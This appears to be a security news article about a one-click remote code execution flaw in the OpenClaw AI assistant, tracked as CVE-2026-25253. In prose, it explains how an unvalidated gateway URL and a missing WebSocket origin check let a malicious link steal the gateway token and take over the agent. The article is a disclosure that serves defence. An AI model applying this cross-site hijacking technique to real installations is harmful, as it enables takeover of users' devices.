Critical OpenClaw Vulnerability Allows One-Click Remote Code Execution
A significant security vulnerability has been identified in OpenClaw, an open-source autonomous AI personal assistant, which could permit remote code execution (RCE) through a single malicious link. This flaw, designated as CVE-2026-25253 with a CVSS score of 8.8, has been rectified in version 2026.1.29, released on January 30, 2026.
OpenClaw, previously known as Clawdbot and Moltbot, operates locally on user devices and integrates with various messaging platforms. Since its initial release in November 2025, it has rapidly gained popularity, amassing over 149,000 stars on its GitHub repository. The platform emphasizes user control, allowing deployment on personal infrastructure such as laptops, homelabs, or virtual private servers, ensuring that users retain ownership of their data and keys.
The vulnerability arises from the Control UI’s handling of the `gatewayUrl` parameter from the query string without proper validation. Upon loading, the UI automatically connects, transmitting the stored gateway token in the WebSocket connection payload. This behavior enables attackers to craft malicious links or websites that, when accessed by a user, can exfiltrate the token to a server under the attacker’s control. With this token, the attacker can connect to the victim’s local gateway, modify configurations, and execute privileged actions, effectively achieving remote code execution with a single click.
Security researcher Mav Levin, who discovered this flaw, demonstrated that the exploit can be executed within milliseconds after a victim visits a malicious webpage. The attack leverages cross-site WebSocket hijacking due to OpenClaw’s server not validating the WebSocket origin header, allowing it to accept requests from any website and bypass localhost network restrictions.
In response to this vulnerability, OpenClaw’s creator, Peter Steinberger, has released an advisory detailing the issue and the steps taken to address it. Users are strongly advised to update to version 2026.1.29 to mitigate this security risk.
